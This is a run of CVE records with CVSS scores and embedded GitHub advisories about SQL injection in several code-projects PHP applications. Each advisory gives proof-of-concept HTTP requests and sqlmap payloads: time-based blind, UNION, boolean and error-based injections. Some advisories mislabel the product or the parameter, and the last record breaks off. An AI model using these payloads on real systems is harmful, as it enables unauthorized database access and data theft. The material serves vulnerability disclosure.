"subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Product" ], "url": "https://code-projects.org/" }, { "source": "cna@vuldb.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/ppp-src/a/issues/17" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.278250" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.278250" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.411847" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:code-projects:student_record_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "E81D3A4D-EB3A-4716-B5AA-71424DC86572", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/ppp-src/a/issues/17
[ "Exploit", "Third Party Advisory" ]
github.com
[ "ppp-src", "a" ]
# code-projects.org"Student Record System" in PHP 1.0 "pincode-verification.php" SQL injection # NAME OF AFFECTED PRODUCT(S) + Student Record System In PHP With Source Code ## Vendor Homepage + https://code-projects.org/student-record-system-in-php-with-source-code/ # AFFECTED AND/OR FIXED VERSION(S) ## submitter + xxxx ## Vulnerable File + pincode-verification.php ## VERSION(S) + V1.0 ## Software Link + https://download.code-projects.org/details/e7b42365-c27d-4fdb-b4e9-498917d5ba75 # PROBLEM TYPE ## Vulnerability Type + SQL injection ## Root Cause + A SQL injection vulnerability was found in the 'pincode-verification.php ' file of the 'Student Record System' project. The reason for this issue is that attackers inject malicious code from the parameter "pincode" and use it directly in SQL queries without the need for appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations. ## Impact + Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity. # DESCRIPTION + During the security review of the PHP "Student Record System", "xxx" discovered a critical SQL injection vulnerability in the "pincode-verification.php " file. This vulnerability stems from insufficient user input validation of the "pincode" parameter, allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to databases, modify or delete data, and access sensitive information. Immediate remedial measures are needed to ensure system security and protect data integrity. # No login or authorization is required to exploit this vulnerability # Vulnerability details and POC --- POST /pincode-verification.php HTTP/1.1 Host: 192.168.1.116:131 Content-Length: 21 Cache-Control: max-age=0 Origin: http://192.168.1.116:131 Content-Type: application/x-www-form-urlencoded Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: http://192.168.1.116:131/pincode-verification.php Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=u4kenn3o0umcqhg4d9ifp64jip Connection: keep-alive pincode=11111&submit= --- ## Vulnerability type: + time-based blind ## Vulnerability location: + 'pincode' parameter ## Payload: --- Parameter: pincode (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: pincode=11111' AND (SELECT 6987 FROM (SELECT(SLEEP(5)))SZyP) AND 'wxrK'='wxrK&submit= --- + ![1](https://github.com/user-attachments/assets/3ae329ee-e726-4513-b5f1-c3475b592b70) ## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool: + ![2](https://github.com/user-attachments/assets/78e5661c-dccf-4e5b-94a9-74bc75d040d0) + ![3](https://github.com/user-attachments/assets/d7f7a573-ac09-46e6-967d-eec4f1ef6cae) + ![4](https://github.com/user-attachments/assets/d1156c3e-6673-4793-af29-1e4e48a35b19) # Suggested repair 1. **Use prepared statements and parameter binding:** Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code. 2. **Input validation and filtering:** Strictly validate and filter user input data to ensure it conforms to the expected format. 3. **Minimize database user permissions:** Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations. 4. **Regular security audits:** Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.
# code-projects.org"Student Record System" in PHP 1.0 "pincode-verification.php" SQL injection
https://api.github.com/repos/ppp-src/a/issues/17/comments
0
2024-09-21T04:16:46Z
2024-09-21T04:16:46Z
https://github.com/ppp-src/a/issues/17
2,539,960,931
17
6,289
CVE-2024-9085
2024-09-22T08:15:02.393
A vulnerability was found in code-projects Restaurant Reservation System 1.0. It has been rated as critical. This issue affects some unknown processing of the file index.php. The manipulation of the argument date leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The initial researcher advisory mentions sid as affected paramater which is incorrect.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.3, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 6.9, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "NONE", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Product" ], "url": "https://code-projects.org/" }, { "source": "cna@vuldb.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/ppp-src/a/issues/18" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.278261" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.278261" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.411848" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:code-projects:restaurant_reservation_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "EE12AD85-FC4C-4F66-82E3-7BDCB43D3903", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/ppp-src/a/issues/18
[ "Exploit", "Third Party Advisory" ]
github.com
[ "ppp-src", "a" ]
# code-projects.org"Restaurant Reservation System" in PHP 1.0 "index.php" SQL injection # NAME OF AFFECTED PRODUCT(S) + Pharmacy/Medical Store Point of Sale System Using PHP/MySQL and Bootstrap Framework with Source Code ## Vendor Homepage + https://code-projects.org/restaurant-reservation-system-in-php-with-source-code/ # AFFECTED AND/OR FIXED VERSION(S) ## submitter + xxxx ## Vulnerable File + index.php ## VERSION(S) + V1.0 ## Software Link + https://download.code-projects.org/details/5993433b-02e1-4978-b507-46ff075c4465 # PROBLEM TYPE ## Vulnerability Type + SQL injection ## Root Cause + A SQL injection vulnerability was found in the 'index.php ' file of the 'Restaurant Reservation System' project. The reason for this issue is that attackers inject malicious code from the parameter "sid" and use it directly in SQL queries without the need for appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations. ## Impact + Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity. # DESCRIPTION + During the security review of the PHP "Restaurant Reservation System", "xxx" discovered a critical SQL injection vulnerability in the "index.php " file. This vulnerability stems from insufficient user input validation of the "date" parameter, allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to databases, modify or delete data, and access sensitive information. Immediate remedial measures are needed to ensure system security and protect data integrity. # No login or authorization is required to exploit this vulnerability # Vulnerability details and POC --- POST / HTTP/1.1 Host: 192.168.1.116:127 Content-Length: 31 Cache-Control: max-age=0 Origin: http://192.168.1.116:127 Content-Type: application/x-www-form-urlencoded Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: http://192.168.1.116:127/ Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=csmjv4v1qhvt25fuitbhotra5i Connection: keep-alive date=0012-02-03&check_schedule= --- ## Vulnerability type: + time-based blind + UNION query ## Vulnerability location: + 'date' parameter ## Payload: --- Parameter: date (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: date=0012-02-03' AND (SELECT 1313 FROM (SELECT(SLEEP(5)))BeIO) AND 'EjjW'='EjjW&check_schedule= Type: UNION query Title: Generic UNION query (NULL) - 4 columns Payload: date=0012-02-03' UNION ALL SELECT NULL,NULL,CONCAT(0x7170716a71,0x766d79474b57626e4662655a754c6a4e535759666d4f624e5158715771524c56584a756f746f4b6f,0x71707a6b71),NULL-- -&check_schedule= --- + ![1](https://github.com/user-attachments/assets/89ffc7ff-8a2f-42a3-9dd2-0b0aad1f6ab1) ## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool: + ![2](https://github.com/user-attachments/assets/9d0a2d10-8649-43e6-bd73-c6563ed6ee34) + ![3](https://github.com/user-attachments/assets/9dd98ac3-14d7-4dd2-ba0a-f087013d46dd) + ![4](https://github.com/user-attachments/assets/3ddf3059-c72b-480f-b2fe-d2555f7ae019) # Suggested repair 1. **Use prepared statements and parameter binding:** Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code. 2. **Input validation and filtering:** Strictly validate and filter user input data to ensure it conforms to the expected format. 3. **Minimize database user permissions:** Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations. 4. **Regular security audits:** Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.
# code-projects.org"Restaurant Reservation System" in PHP 1.0 "index.php" SQL injection
https://api.github.com/repos/ppp-src/a/issues/18/comments
0
2024-09-21T04:19:00Z
2024-09-21T04:30:03Z
https://github.com/ppp-src/a/issues/18
2,539,961,611
18
6,290
CVE-2024-9086
2024-09-22T21:15:10.813
A vulnerability classified as critical has been found in code-projects Restaurant Reservation System 1.0. Affected is an unknown function of the file /filter.php. The manipulation of the argument from/to leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The initial researcher advisory only mentions the parameter "from" to be affected. But it must be assumed that parameter "to" is affected as well.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "LOW", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Product" ], "url": "https://code-projects.org/" }, { "source": "cna@vuldb.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/ppp-src/a/issues/20" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.278262" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.278262" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.411850" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:code-projects:restaurant_reservation_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "EE12AD85-FC4C-4F66-82E3-7BDCB43D3903", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/ppp-src/a/issues/20
[ "Exploit", "Third Party Advisory" ]
github.com
[ "ppp-src", "a" ]
# code-projects.org"Restaurant Reservation System" in PHP 1.0 "filter.php" SQL injection # NAME OF AFFECTED PRODUCT(S) + Pharmacy/Medical Store Point of Sale System Using PHP/MySQL and Bootstrap Framework with Source Code ## Vendor Homepage + https://code-projects.org/restaurant-reservation-system-in-php-with-source-code/ # AFFECTED AND/OR FIXED VERSION(S) ## submitter + xxxx ## Vulnerable File + filter.php ## VERSION(S) + V1.0 ## Software Link + https://download.code-projects.org/details/5993433b-02e1-4978-b507-46ff075c4465 # PROBLEM TYPE ## Vulnerability Type + SQL injection ## Root Cause + A SQL injection vulnerability was found in the 'filter.php' file of the 'Restaurant Reservation System' project. The reason for this issue is that attackers inject malicious code from the parameter "from" and use it directly in SQL queries without the need for appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations. ## Impact + Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity. # DESCRIPTION + During the security review of the PHP "Restaurant Reservation System", "xxx" discovered a critical SQL injection vulnerability in the "filter.php" file. This vulnerability stems from insufficient user input validation of the "from" parameter, allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to databases, modify or delete data, and access sensitive information. Immediate remedial measures are needed to ensure system security and protect data integrity. # No login or authorization is required to exploit this vulnerability # Vulnerability details and POC --- POST /filter.php HTTP/1.1 Host: 192.168.1.116:129 Content-Length: 56 Cache-Control: max-age=0 Origin: http://192.168.1.116:129 Content-Type: application/x-www-form-urlencoded Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: http://192.168.1.116:129/view.php Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=u4kenn3o0umcqhg4d9ifp64jip Connection: keep-alive from=0011-01-01&to=0001-01-01&company=SENTHIL_INDUSTRIES --- ## Vulnerability type: + time-based blind + UNION query ## Vulnerability location: + 'from' parameter ## Payload: --- Parameter: from (POST) Type: boolean-based blind Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE) Payload: from=0011-01-01' AND EXTRACTVALUE(9262,CASE WHEN (9262=9262) THEN 9262 ELSE 0x3A END)-- crEG&to=0001-01-01&company=SENTHIL_INDUSTRIES Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: from=0011-01-01' AND (SELECT 7315 FROM(SELECT COUNT(*),CONCAT(0x716a6a7a71,(SELECT (ELT(7315=7315,1))),0x7178766271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- zaSB&to=0001-01-01&company=SENTHIL_INDUSTRIES Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: from=0011-01-01' AND (SELECT 8184 FROM (SELECT(SLEEP(5)))tTeF)-- NRRF&to=0001-01-01&company=SENTHIL_INDUSTRIES --- + ![1](https://github.com/user-attachments/assets/484b8102-78a1-4b25-910e-6ef769cdee7d) ## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool: + ![2](https://github.com/user-attachments/assets/8d215169-db8f-41fe-9358-5b48b7d5e745) + ![3](https://github.com/user-attachments/assets/f0b487c0-a256-45ce-ac17-64545c55690f) + ![4](https://github.com/user-attachments/assets/980ec6e6-70f4-4690-8a54-942cfda4a521) # Suggested repair 1. **Use prepared statements and parameter binding:** Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code. 2. **Input validation and filtering:** Strictly validate and filter user input data to ensure it conforms to the expected format. 3. **Minimize database user permissions:** Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations. 4. **Regular security audits:** Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.
# code-projects.org"Restaurant Reservation System" in PHP 1.0 "filter.php" SQL injection
https://api.github.com/repos/ppp-src/a/issues/20/comments
0
2024-09-21T04:35:48Z
2024-09-21T04:35:48Z
https://github.com/ppp-src/a/issues/20
2,539,967,099
20
6,291
CVE-2024-9087
2024-09-22T22:15:02.177
A vulnerability, which was classified as critical, was found in code-projects Vehicle Management 1.0. This affects an unknown part of the file /edit1.php. The manipulation of the argument sno leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.3, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 6.9, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "NONE", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Product" ], "url": "https://code-projects.org/" }, { "source": "cna@vuldb.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/ppp-src/a/issues/19" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.278265" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.278265" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.411849" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:vehicle_management_project:vehicle_management:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "9B2AD25F-FE85-4D6F-9FDD-2439840FE0CB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/ppp-src/a/issues/19
[ "Exploit", "Third Party Advisory" ]
github.com
[ "ppp-src", "a" ]
# code-projects.org"Vehicle Management" in PHP 1.0 "edit1.php " SQL injection # NAME OF AFFECTED PRODUCT(S) + Vehicle Management In PHP With Source Code ## Vendor Homepage + https://code-projects.org/vehicle-management-in-php-with-source-code/ # AFFECTED AND/OR FIXED VERSION(S) ## submitter + xxxx ## Vulnerable File + edit1.php ## VERSION(S) + V1.0 ## Software Link + https://download.code-projects.org/details/9a6dd254-19e2-4358-9012-1431bd83219c # PROBLEM TYPE ## Vulnerability Type + SQL injection ## Root Cause + A SQL injection vulnerability was found in the 'edit1.php ' file of the 'Vehicle Management' project. The reason for this issue is that attackers inject malicious code from the parameter "sno " and use it directly in SQL queries without the need for appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations. ## Impact + Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity. # DESCRIPTION + During the security review of the PHP "Vehicle Management", "xxx" discovered a critical SQL injection vulnerability in the "edit1.php " file. This vulnerability stems from insufficient user input validation of the "sno 